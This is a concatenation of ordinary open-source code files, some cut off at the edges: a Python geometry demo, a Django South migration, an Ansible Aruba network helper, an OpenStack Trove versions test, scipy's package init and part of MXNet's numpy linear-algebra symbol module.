d_xyz[tf.nodes] += tf.control_face.d_arr[:, np.newaxis] * \
tf.control_face.d_xyz_arr
dist_norm = np.linalg.norm(dist_arr)
d_xyz[np.isnan(d_xyz)] = 0.0
return d_xyz.flatten() / dist_norm
def _viz3d_dict_default(self):
raise NotImplemented
if __name__ == '__main__':
cp = ParamFaceOperator(F=[r_, s_, t_])
x_pnt = np.array([0, 0.2, 1], dtype='f')
r0_pnt = np.array([0, 0], dtype='f')
print('r0_pnt:\t\t\t\t', r0_pnt)
print('value of F at r0_pnt:\t\t', cp.get_F(r0_pnt, 0))
print('value of dF_rs at r0_pnt:\t', cp.get_dF_rs(r0_pnt, 0))
print('x_pnt:\t\t\t\t', x_pnt)
print('normality r0_pnt - x_pnt:\t', cp.get_norm_cond(r0_pnt, x_pnt, 0))
print('d(normality r0_pnt - x_pnt):\t', cp.get_d_norm_cond(r0_pnt,
x_pnt, 0))
r_pnt = cp.get_r_pnt(r0_pnt, x_pnt, 0)
print('r_pnt:\t\t\t\t', r_pnt)
print('distance x_pnt - r_pnt:\t\t', cp.get_dist(r_pnt, x_pnt, 0))
target_face = FuFaceNodeDistance(F=[r_, s_, -r_ ** 2 - s_ ** 2],
X_arr=[[0, 0.2, 1],
[1, 4, -2],
[7, 8, 9]])
print('x_arr:\n', target_face.X_arr)
print('r_arr:\n', target_face.r_arr)
print('d_arr:\n', target_face.d_arr)
print('ls_arr:\n', target_face.ls_arr)
print('d_xyz_arr:\n', target_face.d_xyz_arr)
target_face.X_arr = target_face.X_arr + 1.0
print('x_arr:\n', target_face.X_arr)
print('r_arr:\n', target_face.r_arr)
print('d_arr:\n', target_face.d_arr)
print('ls_arr:\n', target_face.ls_arr)
print('d_xyz_arr:\n', target_face.d_xyz_arr)
target_face.F = [r_, s_, t_]
print('x_arr:\n', target_face.X_arr)
print('r_arr:\n', target_face.r_arr)
print('d_arr:\n', target_face.d_arr)
print('ls_arr:\n', target_face.ls_arr)
print('d_xyz_arr:\n', target_face.d_xyz_arr)
| gpl-3.0 |
jmcbailey/django-cached-hitcount | cached_hitcount/south_migrations/0003_auto__add_index_hit_added.py | 2 | 2090 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Hit', fields ['added']
db.create_index('cached_hitcount_hit', ['added'])
def backwards(self, orm):
# Removing index on 'Hit', fields ['added']
db.delete_index('cached_hitcount_hit', ['added'])
models = {
'cached_hitcount.blacklistip': {
'Meta': {'object_name': 'BlacklistIP'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'})
},
'cached_hitcount.hit': {
'Meta': {'ordering': "('-hits',)", 'object_name': 'Hit'},
'added': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 3, 7, 0, 0)', 'db_index': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_hit'", 'to': "orm['contenttypes.ContentType']"}),
'hits': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_pk': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['cached_hitcount'] | gpl-3.0 |
daenamkim/ansible | lib/ansible/module_utils/network/aruba/aruba.py | 2 | 4597 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2016 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback, return_values
from ansible.module_utils.network.common.utils import to_list, ComplexList
from ansible.module_utils.connection import exec_command
_DEVICE_CONFIGS = {}
aruba_provider_spec = {
'host': dict(),
'port': dict(type='int'),
'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME'])),
'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), no_log=True),
'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), type='path'),
'timeout': dict(type='int'),
}
aruba_argument_spec = {
'provider': dict(type='dict', options=aruba_provider_spec)
}
aruba_top_spec = {
'host': dict(removed_in_version=2.9),
'port': dict(removed_in_version=2.9, type='int'),
'username': dict(removed_in_version=2.9),
'password': dict(removed_in_version=2.9, no_log=True),
'ssh_keyfile': dict(removed_in_version=2.9, type='path'),
'timeout': dict(removed_in_version=2.9, type='int'),
}
aruba_argument_spec.update(aruba_top_spec)
def get_provider_argspec():
return aruba_provider_spec
def check_args(module, warnings):
pass
def get_config(module, flags=None):
flags = [] if flags is None else flags
cmd = 'show running-config '
cmd += ' '.join(flags)
cmd = cmd.strip()
try:
return _DEVICE_CONFIGS[cmd]
except KeyError:
rc, out, err = exec_command(module, cmd)
if rc != 0:
module.fail_json(msg='unable to retrieve current config', stderr=to_text(err, errors='surrogate_then_replace'))
cfg = to_text(out, errors='surrogate_then_replace').strip()
_DEVICE_CONFIGS[cmd] = cfg
return cfg
def to_commands(module, commands):
spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
transform = ComplexList(spec, module)
return transform(commands)
def run_commands(module, commands, check_rc=True):
responses = list()
commands = to_commands(module, to_list(commands))
for cmd in commands:
cmd = module.jsonify(cmd)
rc, out, err = exec_command(module, cmd)
if check_rc and rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), rc=rc)
responses.append(to_text(out, errors='surrogate_then_replace'))
return responses
def load_config(module, commands):
rc, out, err = exec_command(module, 'configure terminal')
if rc != 0:
module.fail_json(msg='unable to enter configuration mode', err=to_text(out, errors='surrogate_then_replace'))
for command in to_list(commands):
if command == 'end':
continue
rc, out, err = exec_command(module, command)
if rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), command=command, rc=rc)
exec_command(module, 'end')
| gpl-3.0 |
redhat-openstack/trove | trove/tests/api/versions.py | 8 | 3296 | # Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from proboscis.asserts import assert_equal
from proboscis import before_class
from proboscis import SkipTest
from proboscis import test
from troveclient.compat.exceptions import ClientException
from trove import tests
from trove.tests.util import create_dbaas_client
from trove.tests.util import test_config
from trove.tests.util.users import Requirements
GROUP = "dbaas.api.versions"
@test(groups=[tests.DBAAS_API, GROUP, tests.PRE_INSTANCES, 'DBAAS_VERSIONS'],
depends_on_groups=["services.initialize"])
class Versions(object):
"""Test listing all versions and verify the current version."""
@before_class
def setUp(self):
"""Sets up the client."""
user = test_config.users.find_user(Requirements(is_admin=False))
self.client = create_dbaas_client(user)
@test
def test_list_versions_index(self):
versions = self.client.versions.index(test_config.version_url)
assert_equal(1, len(versions))
assert_equal("CURRENT", versions[0].status,
message="Version status: %s" % versions[0].status)
expected_version = test_config.values['trove_version']
assert_equal(expected_version, versions[0].id,
message="Version ID: %s" % versions[0].id)
expected_api_updated = test_config.values['trove_api_updated']
assert_equal(expected_api_updated, versions[0].updated,
message="Version updated: %s" % versions[0].updated)
def _request(self, url, method='GET', response='200'):
resp, body = None, None
full_url = test_config.version_url + url
try:
resp, body = self.client.client.request(full_url, method)
assert_equal(resp.get('status', ''), response)
except ClientException as ce:
assert_equal(str(ce.http_status), response)
return body
@test
def test_no_slash_no_version(self):
self._request('')
@test
def test_no_slash_with_version(self):
if test_config.auth_strategy == "fake":
raise SkipTest("Skipping this test since auth is faked.")
self._request('/v1.0', response='401')
@test
def test_with_slash_no_version(self):
self._request('/')
@test
def test_with_slash_with_version(self):
if test_config.auth_strategy == "fake":
raise SkipTest("Skipping this test since auth is faked.")
self._request('/v1.0/', response='401')
@test
def test_request_no_version(self):
self._request('/dbaas/instances', response='404')
@test
def test_request_bogus_version(self):
self._request('/0.0/', response='404')
| apache-2.0 |
mtrbean/scipy | scipy/__init__.py | 62 | 4048 | """
SciPy: A scientific computing package for Python
================================================
Documentation is available in the docstrings and
online at http://docs.scipy.org.
Contents
--------
SciPy imports all the functions from the NumPy namespace, and in
addition provides:
Subpackages
-----------
Using any of these subpackages requires an explicit import. For example,
``import scipy.cluster``.
::
cluster --- Vector Quantization / Kmeans
fftpack --- Discrete Fourier Transform algorithms
integrate --- Integration routines
interpolate --- Interpolation Tools
io --- Data input and output
linalg --- Linear algebra routines
linalg.blas --- Wrappers to BLAS library
linalg.lapack --- Wrappers to LAPACK library
misc --- Various utilities that don't have
another home.
ndimage --- n-dimensional image package
odr --- Orthogonal Distance Regression
optimize --- Optimization Tools
signal --- Signal Processing Tools
sparse --- Sparse Matrices
sparse.linalg --- Sparse Linear Algebra
sparse.linalg.dsolve --- Linear Solvers
sparse.linalg.dsolve.umfpack --- :Interface to the UMFPACK library:
Conjugate Gradient Method (LOBPCG)
sparse.linalg.eigen --- Sparse Eigenvalue Solvers
sparse.linalg.eigen.lobpcg --- Locally Optimal Block Preconditioned
Conjugate Gradient Method (LOBPCG)
spatial --- Spatial data structures and algorithms
special --- Special functions
stats --- Statistical Functions
Utility tools
-------------
::
test --- Run scipy unittests
show_config --- Show scipy build configuration
show_numpy_config --- Show numpy build configuration
__version__ --- Scipy version string
__numpy_version__ --- Numpy version string
"""
from __future__ import division, print_function, absolute_import
__all__ = ['test']
from numpy import show_config as show_numpy_config
if show_numpy_config is None:
raise ImportError("Cannot import scipy when running from numpy source directory.")
from numpy import __version__ as __numpy_version__
# Import numpy symbols to scipy name space
import numpy as _num
linalg = None
from numpy import *
from numpy.random import rand, randn
from numpy.fft import fft, ifft
from numpy.lib.scimath import *
__all__ += _num.__all__
__all__ += ['randn', 'rand', 'fft', 'ifft']
del _num
# Remove the linalg imported from numpy so that the scipy.linalg package can be
# imported.
del linalg
__all__.remove('linalg')
# We first need to detect if we're being called as part of the scipy
# setup procedure itself in a reliable manner.
try:
__SCIPY_SETUP__
except NameError:
__SCIPY_SETUP__ = False
if __SCIPY_SETUP__:
import sys as _sys
_sys.stderr.write('Running from scipy source directory.\n')
del _sys
else:
try:
from scipy.__config__ import show as show_config
except ImportError:
msg = """Error importing scipy: you cannot import scipy while
being in scipy source directory; please exit the scipy source
tree first, and relaunch your python intepreter."""
raise ImportError(msg)
from scipy.version import version as __version__
from scipy._lib._version import NumpyVersion as _NumpyVersion
if _NumpyVersion(__numpy_version__) < '1.6.2':
import warnings
warnings.warn("Numpy 1.6.2 or above is recommended for this version of "
"scipy (detected version %s)" % __numpy_version__,
UserWarning)
del _NumpyVersion
from numpy.testing import Tester
test = Tester().test
bench = Tester().bench
| bsd-3-clause |
DickJC123/mxnet | python/mxnet/symbol/numpy/linalg.py | 9 | 35356 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Namespace for operators used in Gluon dispatched by F=symbol."""
import numpy as _np
from . import _symbol
from . import _op as _mx_sym_np # pylint: disable=unused-import
from . import _internal as _npi
__all__ = ['norm', 'svd', 'cholesky', 'qr', 'inv', 'det', 'slogdet', 'solve', 'tensorinv', 'tensorsolve',
'pinv', 'eigvals', 'eig', 'eigvalsh', 'eigh', 'lstsq', 'matrix_rank']
def matrix_rank(M, tol=None, hermitian=False):
"""
Return matrix rank of array using SVD method
Rank of the array is the number of singular values of the array that are
greater than `tol`.
Parameters
M : {(M,), (..., M, N)} _Symbol
Input vector or stack of matrices.
tol : (...) _Symbol, float, optional
Threshold below which SVD values are considered zero. If `tol` is
None, and ``S`` is an array with singular values for `M`, and
``eps`` is the epsilon value for datatype of ``S``, then `tol` is
set to ``S.max() * max(M.shape) * eps``.
hermitian : bool, optional
If True, `M` is assumed to be Hermitian (symmetric if real-valued),
enabling a more efficient method for finding singular values.
Defaults to False.
Returns
-------
rank : (...) _Symbol
Rank of M.
"""
finfo_eps_32 = _np.finfo(_np.float32).eps
finfo_eps_64 = _np.finfo(_np.float64).eps
if tol is None:
return _npi.matrix_rank_none_tol(M, finfo_eps_32, finfo_eps_64, hermitian)
else:
return _npi.matrix_rank(M, tol, hermitian)
def lstsq(a, b, rcond='warn'):
r"""
Return the least-squares solution to a linear matrix equation.
Solves the equation :math:`a x = b` by computing a vector `x` that
minimizes the squared Euclidean 2-norm :math:`\| b - a x \|^2_2`.
The equation may be under-, well-, or over-determined (i.e., the
number of linearly independent rows of `a` can be less than, equal
to, or greater than its number of linearly independent columns).
If `a` is square and of full rank, then `x` (but for round-off error)
is the "exact" solution of the equation.
Parameters
----------
a : (M, N) _Symbol
"Coefficient" matrix.
b : {(M,), (M, K)} _Symbol
Ordinate or "dependent variable" values. If `b` is two-dimensional,
the least-squares solution is calculated for each of the `K` columns
of `b`.
rcond : float, optional
Cut-off ratio for small singular values of `a`.
For the purposes of rank determination, singular values are treated
as zero if they are smaller than `rcond` times the largest singular
value of `a`
The default of ``warn`` or ``-1`` will use the machine precision as
`rcond` parameter. The default of ``None`` will use the machine
precision times `max(M, N)` as `rcond` parameter.
Returns
-------
x : {(N,), (N, K)} _Symbol
Least-squares solution. If `b` is two-dimensional,
the solutions are in the `K` columns of `x`.
residuals : {(1,), (K,), (0,)} _Symbol
Sums of residuals.
Squared Euclidean 2-norm for each column in ``b - a*x``.
If the rank of `a` is < N or M <= N, this is an empty array.
If `b` is 1-dimensional, this is a (1,) shape array.
Otherwise the shape is (K,).
rank : int
Rank of matrix `a`.
s : (min(M, N),) _Symbol
Singular values of `a`.
Raises
------
MXNetError
If computation does not converge.
Notes
-----
If `b` is a matrix, then all array results are returned as matrices.
"""
new_default = False
finfo_eps_32 = _np.finfo(_np.float32).eps
finfo_eps_64 = _np.finfo(_np.float64).eps
if rcond is None:
rcond = 1
new_default = True
if rcond == "warn":
rcond = -1
x, residuals, rank, s = _npi.lstsq(a, b, rcond=rcond, finfoEps32=finfo_eps_32, finfoEps64=finfo_eps_64, new_default=new_default) # pylint: disable=line-too-long
return (x, residuals, rank, s)
def pinv(a, rcond=1e-15, hermitian=False):
r"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate the generalized inverse of a matrix using its
singular-value decomposition (SVD) and including all
*large* singular values.
Parameters
----------
a : (..., M, N) ndarray
Matrix or stack of matrices to be pseudo-inverted.
rcond : (...) {float or ndarray of float}, optional
Cutoff for small singular values.
Singular values less than or equal to
``rcond * largest_singular_value`` are set to zero.
Broadcasts against the stack of matrices.
hermitian : bool, optional
If True, `a` is assumed to be Hermitian (symmetric if real-valued),
enabling a more efficient method for finding singular values.
Defaults to False.
Returns
-------
B : (..., N, M) ndarray
The pseudo-inverse of `a`. If `a` is a `matrix` instance, then so
is `B`.
Raises
------
MXNetError
If the SVD computation does not converge.
Notes
-----
The pseudo-inverse of a matrix A, denoted :math:`A^+`, is
defined as: "the matrix that 'solves' [the least-squares problem]
:math:`Ax = b`," i.e., if :math:`\\bar{x}` is said solution, then
:math:`A^+` is that matrix such that :math:`\\bar{x} = A^+b`.
It can be shown that if :math:`Q_1 \\Sigma Q_2^T = A` is the singular
value decomposition of A, then
:math:`A^+ = Q_2 \\Sigma^+ Q_1^T`, where :math:`Q_{1,2}` are
orthogonal matrices, :math:`\\Sigma` is a diagonal matrix consisting
of A's so-called singular values, (followed, typically, by
zeros), and then :math:`\\Sigma^+` is simply the diagonal matrix
consisting of the reciprocals of A's singular values
(again, followed by zeros). [1]_
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pp. 139-142.
Examples
--------
The following example checks that ``a * a+ * a == a`` and
``a+ * a * a+ == a+``:
>>> a = np.random.randn(2, 3)
>>> pinv_a = np.linalg.pinv(a)
>>> (a - np.dot(a, np.dot(pinv_a, a))).sum()
array(0.)
>>> (pinv_a - np.dot(pinv_a, np.dot(a, pinv_a))).sum()
array(0.)
"""
if hermitian is True:
raise NotImplementedError("hermitian is not supported yet...")
if _symbol._np.isscalar(rcond):
return _npi.pinv_scalar_rcond(a, rcond, hermitian)
return _npi.pinv(a, rcond, hermitian)
# pylint: disable=too-many-return-statements
def norm(x, ord=None, axis=None, keepdims=False):
r"""Matrix or vector norm.
This function is able to return one of eight different matrix norms,
or one of an infinite number of vector norms (described below), depending
on the value of the ``ord`` parameter.
Parameters
----------
x : _Symbol
Input array. If `axis` is None, `x` must be 1-D or 2-D.
ord : {non-zero int, inf, -inf, 'fro', 'nuc'}, optional
Order of the norm (see table under ``Notes``). inf means numpy's
`inf` object.
axis : {int, 2-tuple of ints, None}, optional
If `axis` is an integer, it specifies the axis of `x` along which to
compute the vector norms. If `axis` is a 2-tuple, it specifies the
axes that hold 2-D matrices, and the matrix norms of these matrices
are computed. If `axis` is None then either a vector norm (when `x`
is 1-D) or a matrix norm (when `x` is 2-D) is returned.
keepdims : bool, optional
If this is set to True, the axes which are normed over are left in the
result as dimensions with size one. With this option the result will
broadcast correctly against the original `x`.
Returns
-------
n : _Symbol
Norm of the matrix or vector(s).
Notes
-----
For values of ``ord <= 0``, the result is, strictly speaking, not a
mathematical 'norm', but it may still be useful for various numerical
purposes.
The following norms can be calculated:
===== ============================ ==========================
ord norm for matrices norm for vectors
===== ============================ ==========================
None Frobenius norm 2-norm
'fro' Frobenius norm --
'nuc' -- --
inf max(sum(abs(x), axis=1)) max(abs(x))
-inf min(sum(abs(x), axis=1)) min(abs(x))
0 -- sum(x != 0)
1 max(sum(abs(x), axis=0)) as below
-1 min(sum(abs(x), axis=0)) as below
2 -- as below
-2 -- as below
other -- sum(abs(x)**ord)**(1./ord)
===== ============================ ==========================
The Frobenius norm is given by [1]_:
:math:`||A||_F = [\sum_{i,j} abs(a_{i,j})^2]^{1/2}`
The nuclear norm is the sum of the singular values.
When you want to operate norm for matrices,if you ord is (-1, 1, inf, -inf),
you must give you axis, it is not support default axis.
References
----------
.. [1] G. H. Golub and C. F. Van Loan, *Matrix Computations*,
Baltimore, MD, Johns Hopkins University Press, 1985, pg. 15
Examples
--------
>>> from mxnet import np
>>> a = np.arange(9) - 4
>>> a
array([-4., -3., -2., -1., 0., 1., 2., 3., 4.])
>>> b = a.reshape((3, 3))
>>> b
array([[-4., -3., -2.],
[-1., 0., 1.],
[ 2., 3., 4.]])
>>> np.linalg.norm(a)
array(7.745967)
>>> np.linalg.norm(b)
array(7.745967)
>>> np.linalg.norm(b, 'fro')
array(7.745967)
>>> np.linalg.norm(a, 'inf')
array(4.)
>>> np.linalg.norm(b, 'inf', axis=(0, 1))
array(9.)
>>> np.linalg.norm(a, '-inf')
array(0.)
>>> np.linalg.norm(b, '-inf', axis=(0, 1))
array(2.)
>>> np.linalg.norm(a, 1)
array(20.)
>>> np.linalg.norm(b, 1, axis=(0, 1))
array(7.)
>>> np.linalg.norm(a, -1)
array(0.)
>>> np.linalg.norm(b, -1, axis=(0, 1))
array(6.)
>>> np.linalg.norm(a, 2)
array(7.745967)
>>> np.linalg.norm(a, -2)
array(0.)
>>> np.linalg.norm(a, 3)
array(5.8480353)
>>> np.linalg.norm(a, -3)
array(0.)
Using the `axis` argument to compute vector norms:
>>> c = np.array([[ 1, 2, 3],
... [-1, 1, 4]])
>>> np.linalg.norm(c, axis=0)
array([1.4142135, 2.236068 , 5. ])
>>> np.linalg.norm(c, axis=1)
array([3.7416573, 4.2426405])
>>> np.linalg.norm(c, ord=1, axis=1)
array([6., 6.])
Using the `axis` argument to compute matrix norms:
>>> m = np.arange(8).reshape(2,2,2)
>>> np.linalg.norm(m, axis=(1,2))
array([ 3.7416573, 11.224973 ])
>>> np.linalg.norm(m[0, :, :]), np.linalg.norm(m[1, :, :])
(array(3.7416573), array(11.224973))
"""
if axis is None and ord is None:
return _npi.norm(x, ord=2, axis=None, keepdims=keepdims, flag=-2)
if axis is None or isinstance(axis, (int, tuple)): # pylint: disable=too-many-nested-blocks
if axis is not None:
if isinstance(axis, int):
axis = (axis, )
if len(axis) == 2:
if ord in ['inf', '-inf']:
row_axis, col_axis = axis
if not keepdims:
if row_axis > col_axis:
row_axis -= 1
if ord == 'inf':
return _npi.sum(_symbol.abs(x), axis=col_axis, keepdims=keepdims).max(axis=row_axis, keepdims=keepdims) # pylint: disable=line-too-long
else:
return _npi.sum(_symbol.abs(x), axis=col_axis, keepdims=keepdims).min(axis=row_axis, keepdims=keepdims) # pylint: disable=line-too-long
if ord in [1, -1]:
row_axis, col_axis = axis
if not keepdims:
if row_axis < col_axis:
col_axis -= 1
if ord == 1:
return _npi.sum(_symbol.abs(x), axis=row_axis, keepdims=keepdims).max(axis=col_axis, keepdims=keepdims) # pylint: disable=line-too-long
elif ord == -1:
return _npi.sum(_symbol.abs(x), axis=row_axis, keepdims=keepdims).min(axis=col_axis, keepdims=keepdims) # pylint: disable=line-too-long
if ord in [2, -2]:
return _npi.norm(x, ord=ord, axis=axis, keepdims=keepdims, flag=0)
if ord is None:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=1)
if ord == 'inf':
return _npi.max(_symbol.abs(x), axis=axis, keepdims=keepdims)
#return _npi.norm(x, ord=float('inf'), axis=axis, keepdims=keepdims, flag=3)
elif ord == '-inf':
return _npi.min(_symbol.abs(x), axis=axis, keepdims=keepdims)
#return _npi.norm(x, ord=-float('inf'), axis=axis, keepdims=keepdims, flag=4)
elif ord is None:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=1)
elif ord == 2:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=-1)
elif ord == 'nuc':
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=2)
elif ord in ['fro', 'f']:
return _npi.norm(x, ord=2, axis=axis, keepdims=keepdims, flag=1)
else:
return _npi.norm(x, ord=ord, axis=axis, keepdims=keepdims, flag=-1)
else:
raise TypeError("'axis' must be None, an integer or a tuple of integers.")
# pylint: enable=too-many-return-statements
def svd(a):
r"""
Singular Value Decomposition.
When `a` is a 2D array, it is factorized as ``ut @ np.diag(s) @ v``,
where `ut` and `v` are 2D orthonormal arrays and `s` is a 1D
array of `a`'s singular values. When `a` is higher-dimensional, SVD is
applied in stacked mode as explained below.
Parameters
----------
a : (..., M, N) _Symbol
A real array with ``a.ndim >= 2`` and ``M <= N``.
Returns
-------
ut: (..., M, M) _Symbol
Orthonormal array(s). The first ``a.ndim - 2`` dimensions have the same
size as those of the input `a`.
s : (..., M) _Symbol
Vector(s) with the singular values, within each vector sorted in
descending order. The first ``a.ndim - 2`` dimensions have the same
size as those of the input `a`.
v : (..., M, N) _Symbol
Orthonormal array(s). The first ``a.ndim - 2`` dimensions have the same
size as those of the input `a`.
Notes
-----
The decomposition is performed using LAPACK routine ``_gesvd``.
SVD is usually described for the factorization of a 2D matrix :math:`A`.
The higher-dimensional case will be discussed below. In the 2D case, SVD is
written as :math:`A = U^T S V`, where :math:`A = a`, :math:`U^T = ut`,
:math:`S= \mathtt{np.diag}(s)` and :math:`V = v`. The 1D array `s`
contains the singular values of `a` and `ut` and `v` are orthonormal. The rows
of `v` are the eigenvectors of :math:`A^T A` and the columns of `ut` are
the eigenvectors of :math:`A A^T`. In both cases the corresponding
(possibly non-zero) eigenvalues are given by ``s**2``.
The sign of rows of `u` and `v` are determined as described in
`Auto-Differentiating Linear Algebra <https://arxiv.org/pdf/1710.08717.pdf>`_.
If `a` has more than two dimensions, then broadcasting rules apply.
This means that SVD is working in "stacked" mode: it iterates over
all indices of the first ``a.ndim - 2`` dimensions and for each
combination SVD is applied to the last two indices. The matrix `a`
can be reconstructed from the decomposition with either
``(ut * s[..., None, :]) @ v`` or
``ut @ (s[..., None] * v)``. (The ``@`` operator denotes batch matrix multiplication)
This function differs from the original `numpy.linalg.svd
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.svd.html>`_ in
the following way(s):
- The sign of rows of `u` and `v` may differ.
- Does not support complex input.
"""
return _npi.svd(a)
def cholesky(a):
r"""
Cholesky decomposition.
Return the Cholesky decomposition, `L * L.T`, of the square matrix `a`,
where `L` is lower-triangular and .T is the transpose operator. `a` must be
symmetric and positive-definite. Only `L` is actually returned. Complex-valued
input is currently not supported.
Parameters
----------
a : (..., M, M) ndarray
Symmetric, positive-definite input matrix.
Returns
-------
L : (..., M, M) ndarray
Lower-triangular Cholesky factor of `a`.
Raises
------
MXNetError
If the decomposition fails, for example, if `a` is not positive-definite.
Notes
-----
Broadcasting rules apply.
The Cholesky decomposition is often used as a fast way of solving
.. math:: A \mathbf{x} = \mathbf{b}
(when `A` is both symmetric and positive-definite).
First, we solve for :math:`\mathbf{y}` in
.. math:: L \mathbf{y} = \mathbf{b},
and then for :math:`\mathbf{x}` in
.. math:: L.T \mathbf{x} = \mathbf{y}.
Examples
--------
>>> A = np.array([[16, 4], [4, 10]])
>>> A
array([[16., 4.],
[ 4., 10.]])
>>> L = np.linalg.cholesky(A)
>>> L
array([[4., 0.],
[1., 3.]])
>>> np.dot(L, L.T)
array([[16., 4.],
[ 4., 10.]])
"""
return _npi.cholesky(a, True)
def qr(a, mode='reduced'):
r"""
Compute the qr factorization of a matrix a.
Factor the matrix a as qr, where q is orthonormal and r is upper-triangular.
Parameters
----------
a : (..., M, N) _Symbol
Matrix or stack of matrices to be qr factored.
mode: {‘reduced’, ‘complete’, ‘r’, ‘raw’, ‘full’, ‘economic’}, optional
Only default mode, 'reduced', is implemented. If K = min(M, N), then
* 'reduced’ : returns q, r with dimensions (M, K), (K, N) (default)
Returns
-------
q : (..., M, K) _Symbol
A matrix or stack of matrices with K orthonormal columns, with K = min(M, N).
r : (..., K, N) _Symbol
A matrix or stack of upper triangular matrices.
Raises
------
MXNetError
If factoring fails.
Examples
--------
>>> from mxnet import np
>>> a = np.random.uniform(-10, 10, (2, 2))
>>> q, r = np.linalg.qr(a)
>>> q
array([[-0.22121978, -0.97522414],
[-0.97522414, 0.22121954]])
>>> r
array([[-4.4131265 , -7.1255064 ],
[ 0. , -0.28771925]])
>>> a = np.random.uniform(-10, 10, (2, 3))
>>> q, r = np.linalg.qr(a)
>>> q
array([[-0.28376842, -0.9588929 ],
[-0.9588929 , 0.28376836]])
>>> r
array([[-7.242763 , -0.5673361 , -2.624416 ],
[ 0. , -7.297918 , -0.15949416]])
>>> a = np.random.uniform(-10, 10, (3, 2))
>>> q, r = np.linalg.qr(a)
>>> q
array([[-0.34515655, 0.10919492],
[ 0.14765628, -0.97452265],
[-0.92685735, -0.19591334]])
>>> r
array([[-8.453794, 8.4175 ],
[ 0. , 5.430561]])
"""
if mode is not None and mode != 'reduced':
raise NotImplementedError("Only default mode='reduced' is implemented.")
return _npi.qr(a)
def inv(a):
r"""
Compute the (multiplicative) inverse of a matrix.
Given a square matrix `a`, return the matrix `ainv` satisfying
``dot(a, ainv) = dot(ainv, a) = eye(a.shape[0])``.
Parameters
----------
a : (..., M, M) ndarray
Matrix to be inverted.
Returns
-------
ainv : (..., M, M) ndarray
(Multiplicative) inverse of the matrix `a`.
Raises
------
MXNetError
If `a` is not square or inversion fails.
Examples
--------
>>> from mxnet import np
>>> a = np.array([[1., 2.], [3., 4.]])
array([[-2. , 1. ],
